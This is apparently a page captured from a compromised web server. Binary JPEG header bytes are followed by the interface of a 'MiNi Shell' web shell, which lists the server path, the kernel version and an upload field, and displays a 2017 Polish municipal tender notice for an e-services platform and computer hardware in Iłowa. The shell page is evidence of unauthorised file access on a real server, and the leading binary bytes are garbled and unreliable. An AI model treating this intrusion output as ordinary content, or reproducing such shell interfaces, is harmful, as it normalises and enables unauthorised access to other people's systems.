JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/temp/20170131/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/frontend/runtime/temp/20170131/17182_2017.xml

<?xml version="1.0" encoding="utf-8"?><ZP-400><biuletyn>2017</biuletyn><pozycja>17182</pozycja><data_publikacji>2017-01-31</data_publikacji><nazwa>Gmina Iłowa</nazwa><ulica>ul. Żeromskiego</ulica><nr_domu>27</nr_domu><nr_miesz></nr_miesz><miejscowosc>Iłowa</miejscowosc><kod_poczt>68120 </kod_poczt><panstwo>Polska</panstwo><wojewodztwo>lubuskie</wojewodztwo><tel>68 368 14 00</tel><fax>68 368 14 01</fax><email>w.kaczmarski@ilowa.pl</email><internet></internet><adres_strony_internetowej_narzedzia></adres_strony_internetowej_narzedzia><adres_strony_url>www.ilowa.info.pl</adres_strony_url><podmiot2c></podmiot2c><regon>97077085300000</regon><e_mail></e_mail><ogloszenie>Ogłoszenie o zamówieniu</ogloszenie><czy_obowiazkowa>T</czy_obowiazkowa><zamieszczanie_obowiazkowe>T</zamieszczanie_obowiazkowe><nazwa_projektu_programu>Regonalny Program Operacyjny - Lubuskie 2020 na lata 2014-2020, Oś 2. Rozwój cyfrowy, Działanie 2.1 Rozwój społeczeństwa informacyjnego</nazwa_projektu_programu><czy_ubiegac_zaklady_pracy /><minimalny_procent_zatrudnienia></minimalny_procent_zatrudnienia><czy_przeprowadza_centralny_zamawiajacy /><czy_przeprowadza_podmiot_zamawiajacy_powierzyl /><zamawiajacy_powierzyl></zamawiajacy_powierzyl><czy_przeprowadza_wapolnie /><przeprowadza_wapolnie_podmiot1></przeprowadza_wapolnie_podmiot1><przeprowadza_wapolnie_podmiot2></przeprowadza_wapolnie_podmiot2><czy_przeprowadza_zamawiajacy_z_eu /><postepowanie_wspolne_tresc></postepowanie_wspolne_tresc><informacje_dodatkowe_zamawiajacy></informacje_dodatkowe_zamawiajacy><dotyczy>1</dotyczy><adres_dyn_zak></adres_dyn_zak><rodzaj_zam>administracja samorządowa</rodzaj_zam><wspolne_udzielanie_zamowienia></wspolne_udzielanie_zamowienia><czy_dostep_dokumentow_zamowienia>T</czy_dostep_dokumentow_zamowienia><dostep_dokumentow_zamowienia>www.ilowa.info.pl</dostep_dokumentow_zamowienia><czy_zamieszczona_bedzie_specyfikacja>T</czy_zamieszczona_bedzie_specyfikacja><zamieszczona_bedzie_specyfikacja>www.ilowa.info.pl</zamieszczona_bedzie_specyfikacja><czy_dostep_do_dokumentow_ograniczony /><czy_wymagane_przeslanie_ofert>T</czy_wymagane_przeslanie_ofert><wymagane_przeslanie_ofert_inny>Ofertę można złożyć w Sekretariacie lub przesłać na adres Urzędu Miejskiego w Iłowej</wymagane_przeslanie_ofert_inny><czy_podzielone_na_czesci>N</czy_podzielone_na_czesci><oferty_lub_wnioski /><maksymalna_liczba_czesci></maksymalna_liczba_czesci><zastrezega_prawo_grup_czesci></zastrezega_prawo_grup_czesci><maksymalna_liczba_czesci_jednemu_wykonawcy></maksymalna_liczba_czesci_jednemu_wykonawcy><dostep_do_dokumentow_ograniczony></dostep_do_dokumentow_ograniczony><czy_oferty_wnioski_dostepne /><oferty_wnioski_dostepne></oferty_wnioski_dostepne><czy_dopuszczone_wymagane_przeslanie_ofert /><dopuszczone_wymagane_przeslanie_ofert_inny></dopuszczone_wymagane_przeslanie_ofert_inny><dopuszczone_wymagane_przeslanie_ofert_adres>Urząd Miejski w Iłowej, ul. Żeromskiego 27, 68-120 Iłowa</dopuszczone_wymagane_przeslanie_ofert_adres><czy_komunikacja_elektroniczna_wymaga /><komunikacja_elektroniczna_wymaga></komunikacja_elektroniczna_wymaga><wymagania_dotyczace_rejestracji_wyk_aukcja></wymagania_dotyczace_rejestracji_wyk_aukcja><nazwa_zamowienia>Budowa platformy e-usług wraz z dostawą sprzętu komputerowego dla Gminy Iłowa w ramach projektu: „Rozwój elektronicznych usług dla ludności - tworzenie i wdrożenie interaktywnych usług administracji elektronicznej w Gminie Iłowa”</nazwa_zamowienia><numer_referencyjny>GK-III.271.1.2017</numer_referencyjny><czy_dialog_techniczny /><rodz_zam>U</rodz_zam><przedmiot_zam>W ramach projektu będzie realizowana platforma usług elektronicznych dla zintegrowanego systemu udostępniania informacji publicznej. Podczas realizacji projektu zostanie wdrożona platforma e-usług – oparta na dwóch aplikacjach webowych (e-podatki i e-śmieci) oraz jednej aplikacji mobilnej e-Iłowa.Realizacja projektu spowoduje unowocześnienie infrastruktury informatycznej Urzędu Gminy Iłowa poprzez zakup oprogramowania i sprzętu umożliwiającego świadczenie zaawansowanych technologicznie e-usług.</przedmiot_zam><cpv1c>72421000-7</cpv1c><cpv2c>72212600-5</cpv2c><okres2c>31/12/2017</okres2c><szacunkowa_wart_zam_calosc></szacunkowa_wart_zam_calosc><waluta_calosc></waluta_calosc><czy_przewiduje_udzielenie_zamowien_67 /><czy_przewiduje_udzielenie_zamowien_67_tekst></czy_przewiduje_udzielenie_zamowien_67_tekst><czy_czesci /><czy_czesci_wymaga /><ilosc_czesci></ilosc_czesci><ilosc_czesci_max></ilosc_czesci_max><czy_wariant /><czy_uzup /><zam_uzupelniajace></zam_uzupelniajace><czas>
        O
      </czas><czas_dni></czas_dni><czas_mies></czas_mies><data_roz></data_roz><data_zak></data_zak><ii_2_lub_temp></ii_2_lub_temp><informacje_na_temat_katalogow></informacje_na_temat_katalogow><okreslenie_warunkow></okreslenie_warunkow><informacje_dodatkowe_okreslenie_warunkow></informacje_dodatkowe_okreslenie_warunkow><sytuacja_finansowa_okreslenie_warunkow>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie niniejszego zamówienia. W szczególności Wykonawca musi posiadać środki finansowe lub zdolność kredytową w wysokości co najmniej:  300 000,00 PLN 
Wykonawca, który polega na sytuacji finansowej lub ekonomicznej innych podmiotów, odpowiada solidarnie z podmiotem, który zobowiązał się do udostępnienia zasobów, za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</sytuacja_finansowa_okreslenie_warunkow><sytuacja_finansowa_informacje_dodatkowe></sytuacja_finansowa_informacje_dodatkowe><zdolnosc_techniczna_okreslenie_warunkow>6.9	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej  3 zamówienia o wartości co najmniej 150 000,00 zł netto każde zamówienie, których przedmiotem było wdrożenie platformy usług publicznych e-należności zintegrowanej z ePUAP (karty usług, logowanie profilem zaufanym) i systemami dziedzinowymi (co najmniej podatek rolny, od nieruchomości, księgowość podatkowa).  Każde z zamówienie obejmowało szkolenie dla co najmniej 10 użytkowników wewnętrznych. Wykonali co najmniej jedną dostawę sprzętu komputerowego wraz z oprogramowaniem, o wartości nie mniejszej niż 40.000 zł netto, które zostały zainstalowane w jednostce samorządu terytorialnego.
Ocena spełniania warunku będzie dokonana na podstawie złożonego wykazu wykonanych usług i  dokumentów potwierdzających, że usługi te zostały wykonane lub są wykonywane należycie, przy czym dowodami tymi są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie będzie w stanie uzyskać tych dokumentów – inne dokumenty, na zasadzie spełnia/nie spełnia.
Wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi  stosunków prawnych. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy i doświadczenia na okres realizacji zamówienia.

6.10	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj. zespołem do wykonania i wdrożenia systemu internetowego aplikacji webowych typu e-Urząd w skład, którego będą wchodzić specjaliści posiadający wyższe wykształcenie, wiedzę i kwalifikacje w zakresie :

- Wykonawca powinien dysponować co najmniej 2 konsultantami merytorycznymi dla systemu finansowo-podatkowego spełniającymi następujące wymagania: posiadanie przez każdego konsultanta min. 2 letniego doświadczenia zawodowego w prowadzeniu wdrożeń systemów finansowo-podatkowych oraz udział w co najmniej 2 wdrożeniach ww. systemów.
- Wykonawca powinien dysponować co najmniej 2 konsultantami spełniającymi następujące wymagania każdy: min. 2 letnie doświadczenie zawodowe w prowadzeniu wdrożeń systemów informatycznych w obszarze platform elektronicznych oraz udział w co najmniej 2 wdrożeniach takich systemów.
- Wykonawca powinien dysponować co najmniej 2 specjalistami ds. testów spełniającymi następujące wymagania każdy: min. 2 letnie doświadczenie zawodowe w zakresie testowania systemów informatycznych, brał udział w co najmniej 2 projektach informatycznych w sektorze jednostek administracji publicznej oraz posiada certyfikat ISTQB na poziomie foundation lub wyższy.
- Wykonawca powinien dysponować co najmniej 2 specjalistami ds. wsparcia technicznego spełniającymi następujące wymagania każdy: min. 2 letnie doświadczenie zawodowe w zakresie wsparcia technicznego, brał udział w utrzymaniu co najmniej 2 projektów informatycznych w sektorze jednostek administracji publicznej.
- Wykonawca powinien dysponować co najmniej 4 inżynierami oprogramowania spełniającymi następujące wymagania każdy: posiada wykształcenie wyższe informatyczne, 3 letnie doświadczenie w zakresie wsparcia technicznego, brał udział projektowaniu i budowie co najmniej 3 projektów informatycznych w sektorze jednostek administracji publicznej.
</zdolnosc_techniczna_okreslenie_warunkow><zdolnosc_techniczna_informacje_dodatkowe></zdolnosc_techniczna_informacje_dodatkowe><czy_zdolnosc_techniczna_wymaga_wykonawcow>N</czy_zdolnosc_techniczna_wymaga_wykonawcow><czy_zamawiajacy_przewiduje_wykluczenie>T</czy_zamawiajacy_przewiduje_wykluczenie><art_24_ust_5_pkt_1>T</art_24_ust_5_pkt_1><art_24_ust_5_pkt_2>T</art_24_ust_5_pkt_2><art_24_ust_5_pkt_3>T</art_24_ust_5_pkt_3><art_24_ust_5_pkt_4>T</art_24_ust_5_pkt_4><art_24_ust_5_pkt_5>T</art_24_ust_5_pkt_5><art_24_ust_5_pkt_6>T</art_24_ust_5_pkt_6><art_24_ust_5_pkt_7>T</art_24_ust_5_pkt_7><art_24_ust_5_pkt_8>T</art_24_ust_5_pkt_8><czy_oswiadczenie_niepodleganiu_wykluczenia>T</czy_oswiadczenie_niepodleganiu_wykluczenia><czy_oswiadczenie_spelnienie_kryteriow>T</czy_oswiadczenie_spelnienie_kryteriow><zaliczka /><uprawnienie></uprawnienie><wiedza></wiedza><potencjal></potencjal><zdolne></zdolne><sytuacja></sytuacja><sprawozdanie_calosc></sprawozdanie_calosc><lata_obrotowe></lata_obrotowe><oswiadczenie_potwierdzenia_1 /><oswiadczenie_potwierdzenia_2 /><oswiadczenie_potwierdzenia_3 /><oswiadczenie_potwierdzenia_4 /><oswiadczenie_potwierdzenia_5 /><oswiadczenie_potwierdzenia_6 /><oswiadczenie_potwierdzenia_7 /><oswiadczenie_potwierdzenia_8 /><oswiadczenie_potwierdzenia_9 /><oswiadczenie_potwierdzenia_10 /><oswiadczenie_wykluczenia_1 /><oswiadczenie_wykluczenia_2 /><oswiadczenie_wykluczenia_3 /><oswiadczenie_wykluczenia_4 /><oswiadczenie_wykluczenia_5 /><oswiadczenie_wykluczenia_6 /><oswiadczenie_wykluczenia_7 /><dok_podm_zag_1 /><dok_podm_zag_2 /><dok_podm_zag_3 /><dok_podm_zag_4 /><dok_potw_1 /><dok_potw_2 /><dok_potw_3 /><dok_potw_4 /><dok_potw_5 /><dok_potw_6 /><inne_dok_potw></inne_dok_potw><inne_dokumenty></inne_dokumenty><niepelnosprawne /><oswiadczenie_przedlozyc /><inne_dokumenty></inne_dokumenty><wykaz_dokumentow_zaswiadczen>Wypełniony formularz o braku podstaw do wykluczenia - wzór stanowi Załącznik nr 3 do SIWZ</wykaz_dokumentow_zaswiadczen><zakresie_warunkow_udzialu>Wypełniony formularz o spełnieniu warunków udziału w postępowaniu- wzór stanowi Załącznik nr 2 do SIWZ</zakresie_warunkow_udzialu><zakresie_kryteriow_selekcji>Wypełniony formularz o spełnieniu kryteriów selekcji – wzór stanowi Załącznik nr 11 do SIWZ</zakresie_kryteriow_selekcji><inne_dokumenty_niewymienione>Do oferty składanej na zamówienie wykonawca dostarczy - Zestaw testowy, który  należy umieścić w zamkniętym opakowaniu - uniemożliwiającym dostęp do zawartości bez uszkodzenia tego opakowania. Opakowanie winno być opisane: 
Zestaw testowy dla zamówienia pn.: Budowa platformy e-usług wraz z dostawą sprzętu komputerowego dla Gminy Iłowa w ramach projektu: „Rozwój elektronicznych usług dla ludności - tworzenie i wdrożenie interaktywnych usług administracji elektronicznej w Gminie Iłowa”.
Zamawiający zbada aplikację zgodnie z Załącznikiem Nr 8 do SIWZ

W celu wykazania, że sprzęt i oprogramowanie spełnia wymogi zawarte w Szczegółowym Opisie Przedmiotu Zamówienia (Załącznik nr 7 do SIWZ) Wykonawca dostarczy wypełniony Załącznik nr 6 - Parametry techniczne dostarczonego sprzętu i usług.

Wykonawca dostarczy:
Dla komputerów:
a) Wydruk raportu z oprogramowania testującego procesor lub wydruk zawartości ekranu [Print Screen ekranu] z przeprowadzonych testów, pozwalających na potwierdzenie wartości „Passmark CPU Mark” w testach CPU opublikowanych przez niezależną firmę PassMark Software na stronie http://www.cpubenchmark.net/cpu_list.php; Procesor dedykowany do pracy w komputerach typu desktop o wydajności pozwalającej na osiągnięcie wartości „Passmark CPU Mark” min. 7100 pkt. 
b) Wydruk ze strony http://www.plugloadsolutions.com/80pluspowersupplies.aspx potwierdzający spełnienie wymogu 80plus, w przypadku kiedy u producenta występuje kilka zasilaczy które są montowane na etapie produkcji w fabryce załączyć wydruki dla wszystkich zasilaczy. Wydruki 80plus musza być potwierdzone przez producenta lub dołączone oświadczenie producenta komputera iż wskazane zasilacze przez wykonawcę spełniają 80plus.	
c) Wydruk raportu z oprogramowania testującego procesor lub wydruk zawartości ekranu [Print Screen ekranu] z przeprowadzonych testów wydajnościowych przeprowadzonych na automatycznych ustawieniach konfiguratora dołączonego przeze firmę BAPCO i przy natywnej rozdzielczości wyświetlacza oraz włączonych wszystkich urządzaniach. Komputer w oferowanej konfiguracji musi osiągać wyniki co najmniej: 
SYSmark® 2014 PerformanceTest :
- SM 2014 Overall RRating – co najmniej wynik 1500 punktów,
- Office Productivity – co najmniej wynik 1100 punktów,
- Media Creation – co najmniej wynik 1720 punktów,
- Data/Financial Analysis – co najmniej wynik 1800 punktów.
Nie dopuszcza się stosowanie overclokingu, oprogramowania wspomagającego pochodzącego z innego źródła niż fabrycznie zainstalowane oprogramowanie przez producenta, ingerowania w  ustawieniach BIOS ( tzn. wyłączanie urządzeń stanowiących pełną konfigurację) jak również w samym środowisku systemu (tzn. zmniejszanie rozdzielczości, jasności i kontrastu itp.). 
Zamawiający zastrzega sobie, iż w celu sprawdzenia poprawności przeprowadzonych wszystkich wymaganych testów Oferent musi dostarczyć Zamawiającemu oprogramowanie testujące, komputer do testu oraz dokładny opis metodyki przeprowadzonego testu wraz z wynikami w celu ich sprawdzenia w terminie nie dłuższym niż 3 dni od otrzymania zawiadomienia od Zamawiającego.
d) Wydruk raportu z oprogramowania testującego kartę graficzną i dźwiękową lub wydruk zawartości ekranu [Print Screen ekranu] z przeprowadzonych testów, pozwalających na potwierdzenie wartości „Passmark G3D Mark” w testach Avarage G3D Mark opublikowanych przez niezależną firmę PassMark Software na stronie http://www.videobenchmark.net_list.php. Karta graficzna osiągająca wydajność mierzoną w „Passmark CPU Mark” w komputerach typu desktop min. 975 pkt.
e) Certyfikat ISO9001 lub równoważny, dla producenta sprzętu komputerowego.
f) Certyfikat EnergyStar 6.0 dla producenta sprzętu komputerowego.
g) Deklaracja właściwości użytkowych producenta.
h) Certyfikat producenta systemu operacyjnego, potwierdzający poprawną współpracę oferowanych modeli komputerów z oferowanym systemem operacyjnym (załączyć wydruk ze strony producenta systemu).
i) Oświadczenia producenta potwierdzającego partnera serwisowego.
j) Oświadczenie producenta, że w przypadku nie wywiązywania się z obowiązków gwarancyjnych oferenta lub firmy serwisującej, przejmie na siebie wszelkie zobowiązania związane z serwisem.
k) Oświadczenie producenta, że w przypadku wymiany dysku twardego uszkodzony dysk pozostaje u Zamawiającego. 
l) Oświadczenie producenta na Potwierdzenie spełnienia kryteriów środowiskowych, w tym zgodności z dyrektywą RoHS Unii Europejskiej o eliminacji substancji niebezpiecznych (wg wytycznych Krajowej Agencji Poszanowania Energii S.A., zawartych w dokumencie „Opracowanie propozycji kryteriów środowiskowych dla produktów zużywających energię możliwych do wykorzystania przy formułowaniu specyfikacji na potrzeby zamówień publicznych”, pkt. 3.4.2.1; dokument z grudnia 2006), w szczególności zgodności z normą ISO 1043-4 lub równoważną dla płyty głównej oraz elementów wykonanych z tworzyw sztucznych o masie powyżej 25 gram.
m) Wyniki testów głośność jednostki centralnej mierzonej zgodnie z normą ISO 7779 oraz wykazanej zgodnie z normą ISO 9296 w pozycji obserwatora w trybie pracy dysku twardego (IDLE) wynosząca maksymalnie 26 dB. Zamawiający dopuszcza załączenie oświadczenie producenta potwierdzające spełnianie tego warunku. 
n) Wpis dotyczący oferowanego komputera w  internetowym katalogu http://www.eu-energystar.org lub http://www.energystar.gov – dopuszcza się wydruk ze strony internetowej.
 
Dla serwera:
a) Pełny protokół testów SPEC poświadczony przez producenta wykazujący, że oferowane procesory w serwerze osiągają w testach wydajności (dla obsadzonych 2 procesorów) SPECint_rate2006 min. 670 pkt.
b) Oświadczenie producenta oferowanego sprzętu serwerowego, że wszystkie komponenty z których zbudowanych jest oferowany sprzęt są produktami producenta tego serwera lub są przez niego certyfikowane oraz są objęte gwarancją producenta z czasem reakcji identycznym co gwarancja na serwer. 
c) Oświadczenie producenta oferowanego sprzętu serwerowego, że sprzęt jest fabrycznie nowy oraz, że pochodzi z oficjalnego kanału dystrybucyjnego w Polsce. 
d) Karta produktowa oferowanego serwera umożliwiająca weryfikacją wszystkich wymaganych w specyfikacji parametrów oferowanego sprzętu.

Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, wystawioną w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert</inne_dokumenty_niewymienione><wykaz_potwierdzenie_okolicznosci>9.5	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali co najmniej  3 zamówienia o wartości co najmniej 150 000,00 zł netto każde zamówienie, których przedmiotem było wdrożenie platformy usług publicznych e-należności zintegrowanej z ePUAP (karty usług, logowanie profilem zaufanym) i systemami dziedzinowymi (co najmniej podatek rolny, od nieruchomości, księgowość podatkowa).  Każde z zamówienie obejmowało szkolenie dla co najmniej 10 użytkowników wewnętrznych. Wykonali co najmniej jedną dostawę sprzętu komputerowego wraz z oprogramowaniem, o wartości nie mniejszej niż 40.000 zł netto, które zostały zainstalowane w jednostce samorządu terytorialnego – wzór wykazu stanowi Załącznik nr 4 do SIWZ</wykaz_potwierdzenie_okolicznosci><wadium>15.1	Wykonawca jest zobowiązany do wniesienia wadium w wysokości 8 000,00 PLN (słownie: 8 tysięcy złotych).
15.2	Wykonawca zobowiązany jest zabezpieczyć ofertę wadium na cały okres związania ofertą.
15.3	Wadium może być wniesione w jednej lub w kilku następujących formach wybranych przez Wykonawcę:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo – kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).

UWAGA:  W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja powinna być sporządzona zgodnie z obowiązującym prawem i powinna zawierać następujące elementy:
a)	nazwę dającego zlecenie udzielenia gwarancji (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib;
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją;
c)	kwotę gwarancji;
d)	termin ważności gwarancji;
e)	bezwarunkowe zobowiązanie gwaranta do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego w przypadkach określonych w art. 46 ust. 4a i 5 ustawy Prawo zamówień publicznych.
15.4	Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert.
15.5	Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego w Banku Spółdzielczym w Iłowej o numerze:
50 9658 0006 0000 1443 2007 0004  z dopiskiem „wadium – „Budowa platformy e-usług wraz z dostawą sprzętu komputerowego dla Gminy Iłowa”
Kopię przelewu należy załączyć do oferty. 
Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli do upływu terminu składania ofert  znajdzie się na rachunku bankowym Zamawiającego.
15.6	W przypadkach, gdy wadium wnoszone jest w formach innych niż pieniądz, Wykonawca składa oryginał dokumentu wadium wraz z ofertą.
15.7	Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt 15.8 SIWZ.
15.8	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy Pzp, pełnomocnictw, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.

Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana: 
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach    określonych w ofercie;
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
15.9	Zamawiający zwraca wadium Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.
15.10	Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
15.11	Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt 15.7 SIWZ, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
